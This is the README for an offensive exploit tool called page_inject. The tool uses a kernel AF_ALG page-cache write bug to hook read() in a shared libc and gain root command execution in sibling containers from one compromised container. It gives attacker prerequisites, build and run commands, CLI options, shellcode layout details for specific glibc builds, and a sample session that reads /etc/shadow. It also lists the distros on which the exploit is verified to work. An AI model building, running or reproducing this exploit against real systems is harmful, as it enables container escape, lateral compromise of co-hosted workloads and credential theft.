AF_ALG aead vulnerability cross-container exploit -- pivot from one compromised container into every sibling container that shares the same libc.so.6 image layer.
This is an escape primitive: it runs from
inside an unprivileged container that the attacker has already
compromised, and uses the AF_ALG authencesn ESN-rotation 4-byte
arbitrary-write bug (CVE-2026-31431) to plant a persistent read()
hook in the page-cache pages of libc.so.6. Because Docker /
containerd back overlayfs lower-layer files with shared inodes,
those pages are visible to every sibling container instantiated from
the same image -- the hook fires in their processes too, and the
attacker gets command execution inside each one.
- Attacker has shell access to a single container (call it `victim`) on a host that runs other containers (siblings) from the same image as `victim`.
- `victim` runs with default Docker/k8s posture: unprivileged uid inside the container's user namespace, default seccomp profile, default AppArmor profile, no special capabilities, no host bind mounts.
- `victim` has only:
  - read access to its own libc (`/usr/lib/x86_64-linux-gnu/libc.so.6` or wherever the distro installs it)
  - the standard `socket(AF_ALG, ...)` syscall family
  - the standard `splice` / `vmsplice` syscalls
  - write access to a directory it can `chmod +x` (e.g. `/tmp`)
- The kernel must be vulnerable to CVE-2026-31431 (any `algif_aead` + `authencesn` build prior to the upstream revert fix).

That is all. No special CAP_*, no host filesystem
access. The attacker drops a self-contained statically-linked binary
inside the container, runs it, and the page-cache corruption -- and
therefore the hook -- becomes visible to every sibling.

- Page-cache page identity. Inside an overlayfs container, `/usr/lib/.../libc.so.6` is served by the lower image layer's ext4 inode. Every container started from the same image shares that backing inode, and the kernel's page cache is keyed by the underlying inode -- not by the overlay or by the namespace. So a single 4-byte write into a page-cache page is visible to all sibling containers' processes that have that page mmap'd.
- AF_ALG aead vuln turns one such write into many. `algif_aead` chains the user RX iovec with the trailing `authsize` bytes of the spliced TX SGL, and `authencesn`'s ESN rotation parks 4 bytes of the AAD's `seq_high` field at `dst[assoclen + cryptlen]` -- which is the first byte of that chained foreign tail. The spliced page is a page-cache page of a file the attacker only has read access to, but the cipher copies bytes into it anyway, with no dirty bookkeeping. (See `crypto/algif_aead.c` and `crypto/authencesn.c` for the underlying mechanics.)
- Bootstrapping a callable primitive. The first thing `page_inject` does is bootstrap Zone A -- an asm-encoded re-implementation of the same AF_ALG dance (`write_cache.asm`), placed inside libc's `.text` cave. This makes the 4-byte write a regular `call` from inside any future hook payload, no per-call socket setup needed.
- Installing the hook. The injector then writes Zone C (`zone_c.asm`) into libc's `.text` cave and patches the first 7-12 bytes of `read()` with an `E9 disp32` jump to it. The prologue's displaced bytes are emulated faithfully in Zone C's fast-path (three different glibc prologues are recognised -- see "Prologue handling" below). The hook is now live in libc's page cache.
- Hook propagation. Every sibling container runs processes that call `read()` constantly (logging daemons, healthchecks, `cat /etc/hostname`, anything). On the first such call inside a sibling container, the hijacked prologue jumps into Zone C, which:
  - `stat("/")`s the container's root inode (a stable per-namespace ID), uses it as the container's slot key,
  - scans the slot table for an existing entry with that key,
  - if absent, registers the key and `fork()`s a long-lived command-loop child that polls the CMD area for orders,
  - returns to `read()+N` so the caller is none the wiser.

  The original sibling process keeps running. From now on the attacker has a daemon inside that container.
- Command channel. The attacker uses the same `page_inject` binary in `--shell` mode to write commands into the slot region's CMD area. Each registered sibling container's hook child polls, forks `/bin/sh -c <cmd>`, captures stdout/stderr into the OUTPUT area, signals completion, and goes back to polling. The shell shows the output. Because every CMD/OUTPUT write also goes through the vuln primitive, no special privilege is needed.
- Unhook. When done, `unhook` restores `read()`'s original prologue bytes and zeros the slot table; hook children see an empty slot on their next iteration and self-terminate. The page-cache modifications themselves are clean (the kernel never marked the modified pages dirty), so once every container that has libc mmap'd is stopped, a `drop_caches` reverts the cache fully -- no on-disk artefact remains.

The injector is built outside the victim container -- typically
on the attacker's own development machine -- because most production
container images don't ship a compiler. A standard Linux x86_64 dev
environment with `gcc` (with `-static` link support) and `nasm` is
enough.

    make            # assembles .asm sources via gen_arrays.sh, links static page_inject
    make shellcode  # also produces inspectable .bin flat binaries
    make clean      # removes generated files and the binary

The output is a single statically-linked ELF (`./page_inject`) that
runs on any modern x86_64 Linux kernel.

Once the attacker has shell on victim, they upload the binary to a
writable directory (typically /tmp):

    # inside the compromised container, attacker session
    victim$ ./page_inject

With no arguments, `page_inject` defaults to
`/usr/lib/x86_64-linux-gnu/libc.so.6` (the post-merge Debian/Ubuntu
location). For other distros the libc is at a different path; either
pass it explicitly or use `--root /` to scan the built-in lookup
table from the container's root:

    # Fedora / Rocky / CentOS
    victim$ ./page_inject /usr/lib64/libc.so.6
    # Arch
    victim$ ./page_inject /usr/lib/libc.so.6
    # Auto-detect, regardless of distro:
    victim$ ./page_inject --root /

Either invocation does the same thing: ELF-parse the in-container
libc, install the hook in its page cache, monitor the slot table for
~30 s while siblings register, and run a one-shot `id` against the
first sibling that registered as a sanity check.

After bootstrap, drop into the command shell to drive any registered sibling:

    victim$ ./page_inject --shell --no-bootstrap
    === page-cache shell ===
    Containers (3):
      [0] 0x0018598d <- target
      [1] 0x001859ab
      [2] 0x001859cd
    inject:0018598d> exec id
    uid=0(root) gid=0(root) groups=0(root)
    inject:0018598d> target 0x001859ab
    inject:001859ab> exec hostname
    1ccd66abee9d
    inject:001859ab> exec cat /etc/shadow
    root:$6$.....
    inject:001859ab> unhook
    ... read() prologue restored, slot table zeroed ...

unhook cleans the hook out of every sibling container in one shot
and lets the hook children self-terminate.

    Usage: page_inject [OPTIONS] [LIBC_PATH]

    Options:
      --root <prefix>   Auto-resolve libc.so.6 under <prefix> using the
                        built-in fixed-path lookup table. Inside the
                        victim container that's normally --root / .
      --shell [0xKEY]   Drop into interactive command shell after
                        injection. Optional KEY pre-selects the target.
      --no-bootstrap    Skip injection (shell-only; hook must already
                        be live in the page cache).
      --timeout SEC     Slot monitoring timeout in --shell mode
                        (default 30 s).
      --help, -h        Show help.

    Default libc (when no --root and no LIBC_PATH given):
      /usr/lib/x86_64-linux-gnu/libc.so.6

Different glibc builds leave different amounts of .text cave space
between the executable LOAD segment and the next read-only LOAD.
page_inject selects between two layouts at inject time:

- Path A -- libc-only (default). Both Zone C and Zone A live in libc's `.text` cave. The slot table + CMD + OUTPUT areas live in libc's `.hash` section -- legacy SysV hash data that ld.so doesn't read at runtime since it uses `.gnu.hash` instead. When `.hash` is absent (Arch's modern toolchain), `page_inject` carves the slot region out of the tail of `.eh_frame_hdr` instead, after first shrinking the `fde_count` field so the unwinder no longer considers the freed bytes part of the FDE binary-search index (the unwinder transparently falls through to a linear scan of `.eh_frame` for any IP whose FDE used to be in the truncated range -- LSB-mandated behaviour).
- Path B -- libc trampoline + ld.so payload. Some glibc builds shrink the libc cave below the size needed for the full Zone C + Zone A payload (Ubuntu 24.04 / glibc 2.39 ships a 711 B cave). In that case `page_inject` writes a 36 B trampoline into libc's cave -- it does the fast-path `.bss`-key gate intra-libc -- and on the slow path it computes ld.so's runtime base from libc's GOT slot for `_rtld_global` (an ld.so-side symbol every glibc imports privately) and jumps into a base-register variant of Zone C in ld.so's `.text` cave. The slot table + CMD + OUTPUT + `.bss` key all stay in libc; the ld.so-side Zone C reaches them through `rbp + offset` after the trampoline seeds `rbp = libc_base`.

If neither layout fits, page_inject refuses cleanly without
writing anything to libc or ld.so on disk or in the page cache.
Different glibc versions emit different opening sequences in
read(). The injector recognises each one, reads back the bytes
that the hook displaces, and emulates them in Zone C's fast-path so
single-threaded read() resumes correctly at read+N:

| Glibc range | Prologue (after optional `endbr64`) | Notes |
|---|---|---|
| 2.36 / 2.39 | `cmpb $0x0, __libc_single_threaded(%rip)` | 7 bytes; emulated `cmpb` sets ZF for the original `jne .Lthreaded`. |
| 2.43 | `push rbp; movsxd rdi,edi; xor r9d,r9d` | 7 bytes; emulated byte-for-byte. |
| 2.31 / 2.35 | `mov eax, fs:[0x18]` | 8 bytes; emulated byte-for-byte (FS-prefixed `[disp32]` is absolute, not RIP-relative, so byte-copy is faithful). |

The fast-path emulation slot in Zone C is sized for the longest
known prologue (8 bytes) plus the 5-byte rel32 jmp; shorter
prologues fill the trailing slot byte with a NOP filler so the
total slot length is constant.

    page_inject/
      page_inject.c      Main injector: ELF parsing, vuln primitive,
                         dual-path layout selection, inject + unhook.
      zone_c.asm         Path-A hook dispatcher shellcode.
      zone_c_ld.asm      Path-B hook dispatcher (rbp-base variant).
      trampoline.asm     Path-B 36-byte libc-side stub.
      write_cache.asm    Zone A (vuln write primitive shellcode).
      gen_arrays.sh      Assemble .asm -> asm_bytecode.c.
      asm_bytecode.c     [generated] shellcode byte arrays.
      Makefile           Build system.

The exploit has been verified end-to-end on the following container
snap distros. Each entry has had page_inject injected from inside
one container and seen its hook fire in a sibling container started
from the same image; commands executed correctly via the page-cache
channel; and unhook restored the libc page state cleanly.

| Image | glibc | Inject path | `read()` prologue | Slot region |
|---|---|---|---|---|
| `debian:bookworm` | 2.36 | A | cmpb | `.hash` |
| `ubuntu:24.04` | 2.39 | B | cmpb | `.hash` (libc-side, addressed via rbp from ld.so) |
| `ubuntu:22.04` | 2.35 | A | TLS-fs | `.hash` |
| `fedora:40` | 2.39 | A | cmpb | `.hash` |
| `archlinux:latest` | 2.43 | A | push-rbp | `.eh_frame_hdr` (truncated tail) |

- `page_inject` is statically linked deliberately so the attacker's own process is unaffected by the hook it installs.
- `page_inject` recognises an "already hooked" libc (`E9` + nops at `read()`'s prologue) and refuses to re-inject. If you are on a test env and your page cache is stuck in that state, stop all containers using the image and `drop_caches` to reset.